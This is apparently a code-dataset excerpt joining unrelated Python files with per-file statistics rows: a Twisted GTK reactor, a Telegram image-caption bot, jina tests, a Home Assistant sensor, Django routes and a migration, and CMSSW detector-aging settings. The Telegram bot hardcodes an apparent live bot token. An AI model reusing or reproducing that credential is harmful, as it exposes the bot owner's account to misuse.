# if woken by IO, need to cancel the timer
gobject.source_remove(self.doIterationTimer)
self.doIterationTimer = None
def crash(self):
posixbase.PosixReactorBase.crash(self)
self.__crash()
def run(self, installSignalHandlers=1):
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
if self._started:
self.__run()
def _doReadOrWrite(self, source, condition, faildict={
error.ConnectionDone: failure.Failure(error.ConnectionDone()),
error.ConnectionLost: failure.Failure(error.ConnectionLost()),
}):
why = None
inRead = False
if condition & POLL_DISCONNECTED and not (condition & gobject.IO_IN):
if source in self._reads:
why = main.CONNECTION_DONE
inRead = True
else:
why = main.CONNECTION_LOST
else:
try:
if condition & gobject.IO_IN:
why = source.doRead()
inRead = True
if not why and condition & gobject.IO_OUT:
# if doRead caused connectionLost, don't call doWrite
# if doRead is doWrite, don't call it again.
if not source.disconnected:
why = source.doWrite()
except:
why = sys.exc_info()[1]
log.msg('Error In %s' % source)
log.deferr()
if why:
self._disconnectSelectable(source, why, inRead)
def callback(self, source, condition):
log.callWithLogger(source, self._doReadOrWrite, source, condition)
self.simulate() # fire Twisted timers
return 1 # 1=don't auto-remove the source
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.runUntilCurrent()
timeout = min(self.timeout(), 0.1)
if timeout is None:
timeout = 0.1
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
class PortableGtkReactor(selectreactor.SelectReactor):
"""
Reactor that works on Windows.
Sockets aren't supported by GTK+'s input_add on Win32.
"""
_simtag = None
def crash(self):
selectreactor.SelectReactor.crash(self)
import gtk
# mainquit is deprecated in newer versions
if gtk.main_level():
if hasattr(gtk, 'main_quit'):
gtk.main_quit()
else:
gtk.mainquit()
def run(self, installSignalHandlers=1):
import gtk
self.startRunning(installSignalHandlers=installSignalHandlers)
gobject.timeout_add(0, self.simulate)
# mainloop is deprecated in newer versions
if hasattr(gtk, 'main'):
gtk.main()
else:
gtk.mainloop()
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
gobject.source_remove(self._simtag)
self.iterate()
timeout = min(self.timeout(), 0.1)
if timeout is None:
timeout = 0.1
# grumble
self._simtag = gobject.timeout_add(int(timeout * 1010), self.simulate)
def install(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
@param useGtk: should glib rather than GTK+ event loop be
used (this will be slightly faster but does not support GUI).
"""
reactor = Gtk2Reactor(useGtk)
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
def portableInstall(useGtk=True):
"""
Configure the twisted mainloop to be run inside the gtk mainloop.
"""
reactor = PortableGtkReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
if runtime.platform.getType() != 'posix':
install = portableInstall
__all__ = ['install']
| 33.394015
| 92
| 0.633933
| 1,604
| 13,391
| 5.193267
| 0.26808
| 0.023409
| 0.015126
| 0.013806
| 0.219208
| 0.196399
| 0.154382
| 0.144778
| 0.144778
| 0.132533
| 0
| 0.00752
| 0.284968
| 13,391
| 400
| 93
| 33.4775
| 0.862454
| 0.356135
| 0
| 0.295337
| 0
| 0
| 0.01323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.134715
| false
| 0.005181
| 0.082902
| 0.005181
| 0.310881
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8687420e46b4f12f33134641d5dcf6986b995994
| 4,012
|
py
|
Python
|
bot.py
|
menlen/one
|
e24f1489d98faa9b548ebd668f2860c8d671b489
|
[
"Apache-2.0"
] | null | null | null |
bot.py
|
menlen/one
|
e24f1489d98faa9b548ebd668f2860c8d671b489
|
[
"Apache-2.0"
] | null | null | null |
bot.py
|
menlen/one
|
e24f1489d98faa9b548ebd668f2860c8d671b489
|
[
"Apache-2.0"
] | null | null | null |
# This example show how to use inline keyboards and process button presses
import telebot
import time
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
import os, sys
from PIL import Image, ImageDraw, ImageFont
import random
TELEGRAM_TOKEN = '1425859530:AAF5MQE87Zg_bv3B2RLe3Vl2A5rMz6vYpsA'
bot = telebot.TeleBot(TELEGRAM_TOKEN)
channelId = -1001390673326
user_dict = {}
def TextToImg(ext):
IMAGES = [
'AROQ.jpg',
'AK47.jpg',
'BAXT.jpg',
'BASKETBOL.jpg',
'BAXTLI.jpg',
'DOST.jpg',
'ER.jpg',
'ETIK.jpg',
'FUTBOL.jpg',
'GAZ.jpg',
'HOTIN.jpg',
'BAXT.jpg',
'IPHONE.jpg',
'KOLBASA.jpg',
'KONFET.jpg',
'KOZGU.jpg',
'KUCHUK.jpg',
'MOSHINA.jpg',
'NEWISHTON.jpg',
'NOTEBOOK.jpg',
'OMAD.jpg',
'OYINCHOQ.jpg',
'PAYPQO.jpg',
'BAXT.jpg',
'PUL.jpg',
'PULTUG.jpg',
'QORQIZ.jpg',
'SOSISKA.jpg',
'TELEFON.jpg',
'TELEFONZ.jpg',
'TOK.jpg',
'TORSHIM.jpg',
'TUYA.jpg',
'UY.jpg',
'ZAMBARAK.jpg'
]
try:
img = random.choice(IMAGES)
except:
time.sleep(2)
img = random.choice(IMAGES)
# get an image
base = Image.open(img).convert("RGBA")
ext = ext.upper()
text = ext
# make a blank image for the text, initialized to transparent text color
txt = Image.new("RGBA", base.size, (255,255,255,0))
# get a font
fnt = ImageFont.truetype("OpenSans-Italic.ttf", 40)
# get a drawing context
d = ImageDraw.Draw(txt)
# draw text, half opacity
d.text(((800)/2,(1136)/2), text, font=fnt, fill=(255,0,0,255), anchor='mb')
out = Image.alpha_composite(base, txt)
filename = random.randint(1,35)
g = out.save(f'{filename}.png')
return filename
def gen_markup():
markup = InlineKeyboardMarkup()
markup.row_width = 1
markup.add(InlineKeyboardButton("Azo bo'ling", callback_data="cb_yes", url='t.me/onideal'),
InlineKeyboardButton("Tasdiqlash", callback_data="cb_no"))
return markup
def getUserFromChannel(userId):
u = bot.get_chat_member(channelId, userId)
return u.status
@bot.callback_query_handler(func=lambda call: True)
def callback_query(call):
if call.data == "cb_yes":
bot.answer_callback_query(call.id, "Answer is Yes")
elif call.data == "cb_no":
u = getUserFromChannel(call.from_user.id)
if u == 'member':
msg = bot.send_message(call.from_user.id, """\
Juda soz!!!, Ismingizni yozing
""")
bot.register_next_step_handler(msg, process_name_step)
else:
bot.send_message(call.from_user.id, f"Salom {call.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup())
def process_name_step(message):
try:
name = message.text
myfile = TextToImg(name)
photoSend = open(f'{myfile}.png', 'rb')
caption = f'{name} : ismiga sovga @onideal \n@giftmerobot \n@mygiftrobot'
bot.send_photo(message.chat.id, photoSend, caption=caption)
except Exception as e:
bot.reply_to(message, 'oooops')
@bot.message_handler(func=lambda message: True)
def message_handler(message):
us = getUserFromChannel(message.chat.id)
if us == 'member':
msg = bot.send_message(message.chat.id, """\
Juda soz!!!, Ismingizni yozing
""")
bot.register_next_step_handler(msg, process_name_step)
else:
bot.send_message(message.chat.id, f"Salom {message.from_user.first_name}, kanallarga a'zo bo'ling va A'zolikni tekshirish buyrug'ini tanlang", reply_markup=gen_markup())
bot.polling(none_stop=True)
| 30.861538
| 181
| 0.592722
| 483
| 4,012
| 4.815735
| 0.428571
| 0.017197
| 0.020636
| 0.018057
| 0.195185
| 0.187446
| 0.171109
| 0.153912
| 0.153912
| 0.153912
| 0
| 0.023554
| 0.280409
| 4,012
| 129
| 182
| 31.100775
| 0.782127
| 0.053091
| 0
| 0.141509
| 0
| 0.018868
| 0.247884
| 0.028665
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056604
| false
| 0
| 0.056604
| 0
| 0.141509
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86880b5b73b7634f999e8879e1b07c2360a00ae8
| 6,256
|
py
|
Python
|
tests/unit/types/message/test_message.py
|
Immich/jina
|
1f5f7cf4d82029d76ab41df157526fe6f6e0da50
|
[
"Apache-2.0"
] | 1
|
2021-02-25T19:28:50.000Z
|
2021-02-25T19:28:50.000Z
|
tests/unit/types/message/test_message.py
|
Immich/jina
|
1f5f7cf4d82029d76ab41df157526fe6f6e0da50
|
[
"Apache-2.0"
] | 4
|
2020-09-01T17:47:27.000Z
|
2021-04-16T23:11:57.000Z
|
tests/unit/types/message/test_message.py
|
Immich/jina
|
1f5f7cf4d82029d76ab41df157526fe6f6e0da50
|
[
"Apache-2.0"
] | null | null | null |
import sys
from typing import Sequence
import pytest
from jina import Request, QueryLang, Document
from jina.clients.request import request_generator
from jina.proto import jina_pb2
from jina.proto.jina_pb2 import EnvelopeProto
from jina.types.message import Message
from jina.types.request import _trigger_fields
from tests import random_docs
@pytest.mark.parametrize('field', _trigger_fields.difference({'command', 'args', 'flush'}))
def test_lazy_access(field):
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
# access r.train
print(getattr(r, field))
# now it is read
assert r.is_used
def test_multiple_access():
reqs = [Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))]
for r in reqs:
assert not r.is_used
assert r
assert not r.is_used
for r in reqs:
assert not r.is_used
assert r.index
assert r.is_used
def test_lazy_nest_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
# write access r.train
r.docs[0].id = '1' * 16
# now it is read
assert r.is_used
assert r.index.docs[0].id == '1' * 16
def test_lazy_change_message_type():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
# write access r.train
r.control.command = jina_pb2.RequestProto.ControlRequestProto.IDLE
# now it is read
assert r.is_used
assert len(r.index.docs) == 0
def test_lazy_append_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
r.request_type = 'index'
# write access r.train
r.docs.append(Document())
# now it is read
assert r.is_used
def test_lazy_clear_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
# write access r.train
r.ClearField('index')
# now it is read
assert r.is_used
def test_lazy_nested_clear_access():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert not r.is_used
# write access r.train
r.index.ClearField('docs')
# now it is read
assert r.is_used
def test_lazy_msg_access():
reqs = [Message(None, r.SerializeToString(), 'test', '123',
request_id='123', request_type='IndexRequest') for r in request_generator(random_docs(10))]
for r in reqs:
assert not r.request.is_used
assert r.envelope
assert len(r.dump()) == 3
assert not r.request.is_used
for r in reqs:
assert not r.request.is_used
assert r.request
assert len(r.dump()) == 3
assert not r.request.is_used
for r in reqs:
assert not r.request.is_used
assert r.request.index.docs
assert len(r.dump()) == 3
assert r.request.is_used
def test_message_size():
reqs = [Message(None, r, 'test', '123') for r in request_generator(random_docs(10))]
for r in reqs:
assert r.size == 0
assert sys.getsizeof(r.envelope.SerializeToString())
assert sys.getsizeof(r.request.SerializeToString())
assert len(r.dump()) == 3
assert r.size > sys.getsizeof(r.envelope.SerializeToString()) \
+ sys.getsizeof(r.request.SerializeToString())
def test_lazy_request_fields():
reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10)))
for r in reqs:
assert list(r.DESCRIPTOR.fields_by_name.keys())
def test_request_extend_queryset():
q1 = {'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}}
q2 = QueryLang({'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}, 'priority': 1})
q3 = jina_pb2.QueryLangProto()
q3.name = 'SliceQL'
q3.parameters['start'] = 3
q3.parameters['end'] = 4
q3.priority = 2
r = Request()
r.queryset.extend([q1, q2, q3])
assert isinstance(r.queryset, Sequence)
assert len(r.queryset) == 3
for idx, q in enumerate(r.queryset):
assert q.priority == idx
assert q.parameters['start'] == 3
assert q.parameters['end'] == 4
# q1 and q2 refer to the same
assert len({id(q) for q in r.queryset}) == 2
r2 = Request()
r2.queryset.extend(r.queryset)
assert len({id(q) for q in r2.queryset}) == 2
r = Request()
r.queryset.append(q1)
r.queryset.append(q2)
r.queryset.append(q3)
for idx, q in enumerate(r.queryset):
assert q.priority == idx
assert q.parameters['start'] == 3
assert q.parameters['end'] == 4
with pytest.raises(TypeError):
r.queryset.extend(1)
@pytest.mark.parametrize('typ,pb_typ', [('train', jina_pb2.RequestProto.TrainRequestProto),
('index', jina_pb2.RequestProto.IndexRequestProto),
('search', jina_pb2.RequestProto.SearchRequestProto),
('control', jina_pb2.RequestProto.ControlRequestProto)])
def test_empty_request_type(typ, pb_typ):
r = Request()
assert r.request_type is None
with pytest.raises(ValueError):
print(r.body)
r.request_type = typ
assert r._request_type == typ
assert isinstance(r.body, pb_typ)
@pytest.mark.parametrize('typ,pb_typ', [('index', jina_pb2.RequestProto.IndexRequestProto),
('search', jina_pb2.RequestProto.SearchRequestProto)])
def test_add_doc_to_type(typ, pb_typ):
r = Request()
r.request_type = typ
for _ in range(10):
r.docs.append(Document())
r.groundtruths.append(Document())
assert len(r.docs) == 10
assert len(r.groundtruths) == 10
| 32.082051
| 111
| 0.634431
| 853
| 6,256
| 4.520516
| 0.141852
| 0.023859
| 0.035788
| 0.033714
| 0.610737
| 0.544865
| 0.509855
| 0.466805
| 0.466805
| 0.449689
| 0
| 0.019796
| 0.249041
| 6,256
| 194
| 112
| 32.247423
| 0.800979
| 0.037884
| 0
| 0.426573
| 0
| 0
| 0.036137
| 0
| 0
| 0
| 0
| 0
| 0.370629
| 1
| 0.090909
| false
| 0
| 0.06993
| 0
| 0.160839
| 0.013986
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868a5177cfe7a43dcc855371fdd275a394644658
| 2,074
|
py
|
Python
|
homeassistant/components/eight_sleep/binary_sensor.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 2
|
2020-01-03T17:06:33.000Z
|
2020-01-13T18:57:32.000Z
|
homeassistant/components/eight_sleep/binary_sensor.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | 1,016
|
2019-06-18T21:27:47.000Z
|
2020-03-06T11:09:58.000Z
|
homeassistant/components/eight_sleep/binary_sensor.py
|
liangleslie/core
|
cc807b4d597daaaadc92df4a93c6e30da4f570c6
|
[
"Apache-2.0"
] | null | null | null |
"""Support for Eight Sleep binary sensors."""
from __future__ import annotations
import logging
from pyeight.eight import EightSleep
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from . import EightSleepBaseEntity
from .const import DATA_API, DATA_HEAT, DOMAIN
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the eight sleep binary sensor."""
if discovery_info is None:
return
eight: EightSleep = hass.data[DOMAIN][DATA_API]
heat_coordinator: DataUpdateCoordinator = hass.data[DOMAIN][DATA_HEAT]
entities = []
for user in eight.users.values():
entities.append(
EightHeatSensor(heat_coordinator, eight, user.userid, "bed_presence")
)
async_add_entities(entities)
class EightHeatSensor(EightSleepBaseEntity, BinarySensorEntity):
"""Representation of a Eight Sleep heat-based sensor."""
_attr_device_class = BinarySensorDeviceClass.OCCUPANCY
def __init__(
self,
coordinator: DataUpdateCoordinator,
eight: EightSleep,
user_id: str | None,
sensor: str,
) -> None:
"""Initialize the sensor."""
super().__init__(coordinator, eight, user_id, sensor)
assert self._user_obj
_LOGGER.debug(
"Presence Sensor: %s, Side: %s, User: %s",
sensor,
self._user_obj.side,
user_id,
)
@property
def is_on(self) -> bool:
"""Return true if the binary sensor is on."""
assert self._user_obj
return bool(self._user_obj.bed_presence)
| 28.805556
| 81
| 0.700579
| 220
| 2,074
| 6.368182
| 0.390909
| 0.060671
| 0.031406
| 0.025696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217454
| 2,074
| 71
| 82
| 29.211268
| 0.863216
| 0.07377
| 0
| 0.078431
| 0
| 0
| 0.027464
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 1
| 0.039216
| false
| 0
| 0.196078
| 0
| 0.313725
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868d3680b0c2bd4371570ee9b629404359f69eee
| 1,220
|
py
|
Python
|
apps/organization/urls.py
|
stormsha/StormOnline
|
10983b7a9ee09958927731ee3fd74178d7534ff6
|
[
"Apache-2.0"
] | 18
|
2018-03-16T07:11:01.000Z
|
2021-11-18T08:42:11.000Z
|
apps/organization/urls.py
|
stormsha/StormOnline
|
10983b7a9ee09958927731ee3fd74178d7534ff6
|
[
"Apache-2.0"
] | 1
|
2018-03-15T11:40:25.000Z
|
2018-03-15T11:40:25.000Z
|
apps/organization/urls.py
|
stormsha/StormOnline
|
10983b7a9ee09958927731ee3fd74178d7534ff6
|
[
"Apache-2.0"
] | 13
|
2018-03-16T07:11:05.000Z
|
2020-06-23T09:27:49.000Z
|
# _*_ coding: utf-8 _*_
# ---------------------------
__author__ = 'StormSha'
__date__ = '2018/3/28 18:01'
# ---------------------------
# -------------------------django----------------------
from django.conf.urls import url
from .views import OrgView, AddUserAskView, OrgHomeView, OrgCourseView, OrgDescView, OrgTeacherView, AddFavView
from .views import TeacherListView, TeacherDetailView
urlpatterns = [
url(r'^list/$', OrgView.as_view(), name="org_list"),
url(r'^add_ask/$', AddUserAskView.as_view(), name="add_ask"),
url(r'^home/(?P<org_id>\d+)/$', OrgHomeView.as_view(), name="org_home"),
url(r'^course/(?P<org_id>\d+)/$', OrgCourseView.as_view(), name="org_course"),
url(r'^desc/(?P<org_id>\d+)/$', OrgDescView.as_view(), name="org_desc"),
url(r'^org_teacher/(?P<org_id>\d+)/$', OrgTeacherView.as_view(), name="org_teacher"),
# --------------机构收藏-------------------------
url(r'^add_fav/$', AddFavView.as_view(), name="add_fav"),
# -----------------------teacher------------------------------
url(r'^teacher/list/$', TeacherListView.as_view(), name="teacher_list"),
url(r'^teacher/detail/(?P<teacher_id>\d+)/$', TeacherDetailView.as_view(), name="teacher_detail")
]
| 48.8
| 111
| 0.566393
| 142
| 1,220
| 4.598592
| 0.323944
| 0.05513
| 0.137825
| 0.099541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010889
| 0.096721
| 1,220
| 25
| 112
| 48.8
| 0.58167
| 0.193443
| 0
| 0
| 0
| 0
| 0.294479
| 0.141104
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1875
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868dd694341f559c01703d972c3b261cb6620ffe
| 571
|
py
|
Python
|
tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py
|
priyamshah112/Project-Descripton-Blog
|
8e01016c6be79776c4f5ca75563fa3daa839e39e
|
[
"MIT"
] | null | null | null |
tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py
|
priyamshah112/Project-Descripton-Blog
|
8e01016c6be79776c4f5ca75563fa3daa839e39e
|
[
"MIT"
] | 11
|
2019-11-02T20:57:52.000Z
|
2020-09-27T09:08:33.000Z
|
tech_project/lib/python2.7/site-packages/filer/migrations/0010_auto_20180414_2058.py
|
priyamshah112/Project-Descripton-Blog
|
8e01016c6be79776c4f5ca75563fa3daa839e39e
|
[
"MIT"
] | 4
|
2018-08-07T17:13:48.000Z
|
2019-06-13T11:09:32.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('filer', '0009_auto_20171220_1635'),
]
operations = [
migrations.AlterField(
model_name='image',
name='file_ptr',
field=models.OneToOneField(primary_key=True, serialize=False, related_name='filer_image_file', parent_link=True, to='filer.File', on_delete=django.db.models.deletion.CASCADE),
),
]
| 27.190476
| 187
| 0.670753
| 64
| 571
| 5.734375
| 0.65625
| 0.065395
| 0.076294
| 0.119891
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037611
| 0.208406
| 571
| 20
| 188
| 28.55
| 0.774336
| 0.036778
| 0
| 0
| 0
| 0
| 0.122263
| 0.041971
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868dd7b75196bf80f589754ce91dc36872de638a
| 12,166
|
py
|
Python
|
SLHCUpgradeSimulations/Configuration/python/aging.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
SLHCUpgradeSimulations/Configuration/python/aging.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
SLHCUpgradeSimulations/Configuration/python/aging.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
# handle normal mixing or premixing
def getHcalDigitizer(process):
if hasattr(process,'mixData'):
return process.mixData
if hasattr(process,'mix') and hasattr(process.mix,'digitizers') and hasattr(process.mix.digitizers,'hcal'):
return process.mix.digitizers.hcal
return None
def getHGCalDigitizer(process,section):
if hasattr(process,'mix') and hasattr(process.mix,'digitizers'):
if section == 'EE' and hasattr(process.mix.digitizers,'hgceeDigitizer'):
return process.mix.digitizers.hgceeDigitizer
elif section == 'FH' and hasattr(process.mix.digitizers,'hgchefrontDigitizer'):
return process.mix.digitizers.hgchefrontDigitizer
elif section == 'BH' and hasattr(process.mix.digitizers,'hgchebackDigitizer'):
return process.mix.digitizers.hgchebackDigitizer
elif section == 'HFNose' and hasattr(process.mix.digitizers,'hfnoseDigitizer'):
return process.mix.digitizers.hfnoseDigitizer
return None
# change assumptions about lumi rate
def setScenarioHLLHC(module,scenarioHLLHC):
if scenarioHLLHC=="nominal":
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_nominal
module.years = _years_LHC + _years_HLLHC_nominal
elif scenarioHLLHC=="ultimate":
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import _years_LHC, _years_HLLHC_ultimate
module.years = _years_LHC + _years_HLLHC_ultimate
return module
# turnon = True enables default, False disables
# recalibration and darkening always together
def ageHB(process,turnon,scenarioHLLHC):
if turnon:
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HBDarkeningEP
process.HBDarkeningEP = HBDarkeningEP
process.HBDarkeningEP = setScenarioHLLHC(process.HBDarkeningEP,scenarioHLLHC)
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HBDarkening = cms.bool(turnon)
if hasattr(process,'es_hardcode'):
process.es_hardcode.HBRecalibration = cms.bool(turnon)
return process
def ageHE(process,turnon,scenarioHLLHC):
if turnon:
from CalibCalorimetry.HcalPlugins.HBHEDarkening_cff import HEDarkeningEP
process.HEDarkeningEP = HEDarkeningEP
process.HEDarkeningEP = setScenarioHLLHC(process.HEDarkeningEP,scenarioHLLHC)
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HEDarkening = cms.bool(turnon)
if hasattr(process,'es_hardcode'):
process.es_hardcode.HERecalibration = cms.bool(turnon)
return process
def ageHF(process,turnon):
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.HFDarkening = cms.bool(turnon)
if hasattr(process,'es_hardcode'):
process.es_hardcode.HFRecalibration = cms.bool(turnon)
return process
def agedHFNose(process,algo=0):
from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HFNose_setEndOfLifeNoise
process = HFNose_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo)
return process
def agedHGCal(process,algo=0):
from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setEndOfLifeNoise
process = HGCal_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo)
return process
def realisticHGCalStartup(process):
from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setRealisticStartupNoise
process = HGCal_setRealisticStartupNoise(process)
return process
# needs lumi to set proper ZS thresholds (tbd)
def ageSiPM(process,turnon,lumi):
process.es_hardcode.hbUpgrade.doRadiationDamage = turnon
process.es_hardcode.heUpgrade.doRadiationDamage = turnon
# todo: determine ZS threshold adjustments
# adjust PF thresholds for increased noise
# based on: https://baylor.box.com/s/w32ja75krcbxcycyifexu28dwlgrj7wg
hcal_lumis = [300, 1000, 3000, 4500, 1e10]
hcal_thresholds = {
300: {
"seed": [0.5, 0.625, 0.75, 0.75],
"rec": [0.4, 0.5, 0.6, 0.6],
},
1000: {
"seed": [1.0, 1.5, 1.5, 1.5],
"rec": [0.8, 1.2, 1.2, 1.2],
},
3000: {
"seed": [1.25, 2.5, 2.5, 2.5],
"rec": [1.0, 2.0, 2.0, 2.0],
},
4500: {
"seed": [1.5, 3.0, 3.0, 3.0],
"rec": [1.25, 2.5, 2.5, 2.5],
},
}
ctmodules = ['calotowermaker','caloTowerForTrk','caloTowerForTrkPreSplitting','towerMaker','towerMakerWithHO']
for ilumi, hcal_lumi in enumerate(hcal_lumis[:-1]):
if lumi >= hcal_lumi and lumi < hcal_lumis[ilumi+1]:
if hasattr(process,'particleFlowClusterHBHE'):
process.particleFlowClusterHBHE.seedFinder.thresholdsByDetector[0].seedingThreshold = hcal_thresholds[hcal_lumi]["seed"]
process.particleFlowClusterHBHE.initialClusteringStep.thresholdsByDetector[0].gatheringThreshold = hcal_thresholds[hcal_lumi]["rec"]
process.particleFlowClusterHBHE.pfClusterBuilder.recHitEnergyNorms[0].recHitEnergyNorm = hcal_thresholds[hcal_lumi]["rec"]
process.particleFlowClusterHBHE.pfClusterBuilder.positionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"]
process.particleFlowClusterHBHE.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"]
if hasattr(process,'particleFlowClusterHCAL'):
process.particleFlowClusterHCAL.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"]
if hasattr(process,'particleFlowRecHitHBHE'):
process.particleFlowRecHitHBHE.producers[0].qualityTests[0].cuts[0].threshold = hcal_thresholds[hcal_lumi]["rec"]
for ctmod in ctmodules:
if hasattr(process,ctmod):
getattr(process,ctmod).HBThreshold1 = hcal_thresholds[hcal_lumi]["rec"][0]
getattr(process,ctmod).HBThreshold2 = hcal_thresholds[hcal_lumi]["rec"][1]
getattr(process,ctmod).HBThreshold = hcal_thresholds[hcal_lumi]["rec"][-1]
break
return process
def ageHcal(process,lumi,instLumi,scenarioHLLHC):
hcaldigi = getHcalDigitizer(process)
if hcaldigi is not None: hcaldigi.DelivLuminosity = cms.double(float(lumi)) # integrated lumi in fb-1
# these lines need to be further activated by turning on 'complete' aging for HF
if hasattr(process,'g4SimHits'):
process.g4SimHits.HCalSD.InstLuminosity = cms.double(float(instLumi))
process.g4SimHits.HCalSD.DelivLuminosity = cms.double(float(lumi))
# recalibration and darkening always together
if hasattr(process,'es_hardcode'):
process.es_hardcode.iLumi = cms.double(float(lumi))
